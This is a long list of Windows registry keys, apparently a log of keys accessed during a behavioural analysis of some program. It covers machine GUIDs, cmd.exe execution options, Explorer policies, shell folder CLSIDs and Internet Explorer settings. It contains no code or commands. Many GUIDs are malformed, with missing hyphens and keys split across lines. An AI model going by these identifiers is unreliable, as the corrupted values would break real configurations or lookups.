HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SESSION MANAGER\SafeProcessSearchMode
HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\Offload
HKEY_CURRENT_USER\Software\Classes\Interface\{00000134-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{00000134-0000-0000-C000-000000000046}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\Software\Microsoft\Rpc\Extensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\RemoteRpcDll
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BFE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\MachineThrottling
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{372941a3-1bd9-11e5-9838806e6f6e6963}\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{372941a3-1bd9-11e5-9838806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{372941a3-1bd9-11e5-9838806e6f6e6963}\Generation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{372941a4-1bd9-11e5-9838806e6f6e6963}\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{372941a4-1bd9-11e5-9838806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{372941a4-1bd9-11e5-9838806e6f6e6963}\Generation
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\Rpc
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPropertiesMyComputer
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPropertiesRecycleBin
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoInternetIcon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Applications\wsmprovhost.exe
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoCommonGroups
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\DelegateFolders
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{031E4825-7B94-4dc3B131-E946B44C8DD5}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{031E4825-7B94-4dc3B131-E946B44C8DD5}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{04731B67-D933-450a90E6-4ACD2E9408FE}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{04731B67-D933-450a90E6-4ACD2E9408FE}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{0875DCB6-C686-42439432-ADCCF0B9F2D7}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{0875DCB6-C686-42439432-ADCCF0B9F2D7}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{11016101-E366-4D22BC06-4ADA335C892B}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{11016101-E366-4D22BC06-4ADA335C892B}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{138508bc-1e03-49ea9c8f-ea9e1d05d65d}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{138508bc-1e03-49ea9c8f-ea9e1d05d65d}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{26EE0668-A00A-44D79371-BEB064C98683}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{26EE0668-A00A-44D79371-BEB064C98683}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{4336a54d-038b-4685ab02-99bb52d3fb8b}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{4336a54d-038b-4685ab02-99bb52d3fb8b}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{450D8FBA-AD25-11D098A8-0800361B1103}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{450D8FBA-AD25-11D098A8-0800361B1103}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{5399E694-6CE5-4D6C8FCE-1D8870FDCBA0}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{5399E694-6CE5-4D6C8FCE-1D8870FDCBA0}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{59031a47-3f72-44a789c5-5595fe6b30ee}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{59031a47-3f72-44a789c5-5595fe6b30ee}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{645FF040-5081-101B9F08-00AA002F954E}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{645FF040-5081-101B9F08-00AA002F954E}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{89D83576-6BD1-4c869454-BEB04E94C819}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{89D83576-6BD1-4c869454-BEB04E94C819}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{9343812e-1c37-4a49a12e-4b2d810d956b}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{9343812e-1c37-4a49a12e-4b2d810d956b}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{B0FBD52D-C4A7-4a19985D-11309D1AC8AE}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{B0FBD52D-C4A7-4a19985D-11309D1AC8AE}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{B4FB3F98-C1EA-428dA78A-D1F5659CBA93}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{B4FB3F98-C1EA-428dA78A-D1F5659CBA93}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{BD7A2E7B-21CB-41b2A086-B309680C6B7E}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{BD7A2E7B-21CB-41b2A086-B309680C6B7E}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{daf95313-e44d-46af-be1bcbacea2c3065}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{daf95313-e44d-46af-be1bcbacea2c3065}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{e345f35f-9397-435c-8f954e922c26259e}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{e345f35f-9397-435c-8f95-
4e922c26259e}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{ED228FDF-9EA8-487083b1-96b02CFE0D52}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{ED228FDF-9EA8-487083b1-96b02CFE0D52}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{F02C1A0D-BE21-435088B0-7367FC96EF3C}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{F02C1A0D-BE21-435088B0-7367FC96EF3C}\SuppressionPolicy
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\DelegateFolders
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\Desktop\NameSpace
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\Desktop\NameSpace\DelegateFolders
HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D808002B30309D}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D808002B30309D}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D808002B30309D}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D808002B30309D}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D808002B30309D}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D808002B30309D}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D808002B30309D}\ShellFolder\HasNavigationEnum
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{20D04FE0-3AEA-1069-A2D8-08002B30309D}
HKEY_CLASSES_ROOT\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D708002B30309D}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D708002B30309D}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D708002B30309D}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D708002B30309D}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D708002B30309D}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D708002B30309D}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D708002B30309D}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D708002B30309D}\ShellFolder\HasNavigationEnum
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{208D2C60-3AEA-1069-A2D7-08002B30309D}
HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA08002B30309D}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA08002B30309D}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA08002B30309D}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA08002B30309D}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA08002B30309D}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA08002B30309D}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA08002B30309D}\ShellFolder\HasNavigationEnum
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{871C5380-42A0-1069-A2EA08002B30309D}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{871C5380-42A0-1069-A2EA-08002B30309D}
HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA08002B30309D}\InProcServer32\LoadWithoutCOM
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Blocked
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Blocked
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot\Option
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\AppCompatibility
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\AppCompat
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{871c5380-42a0-1069-a2ea-08002b30309d}\InProcServer32
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom\ieframe.dll
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{871C5380-42A0-1069-A2EA-08002B30309D}
{000214E6-0000-0000-C000-000000000046} 0xFFFF
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\SQMClient\Windows
HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\CEIPEnable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Objects\{871C5380-42A0-1069-A2EA-08002B30309D}
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\INTERNET
EXPLORER\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\wsmprovhost.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\INTERNET
EXPLORER\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\*
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Security_HKLM_only
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ALLOW_REVERSE_SOLIDUS_IN_USERINFO_KB932562
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\INTERNET
EXPLORER\MAIN\FeatureControl\FEATURE_ALLOW_REVERSE_SOLIDUS_IN_USERINFO_KB932562
HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder\UseDropHandler
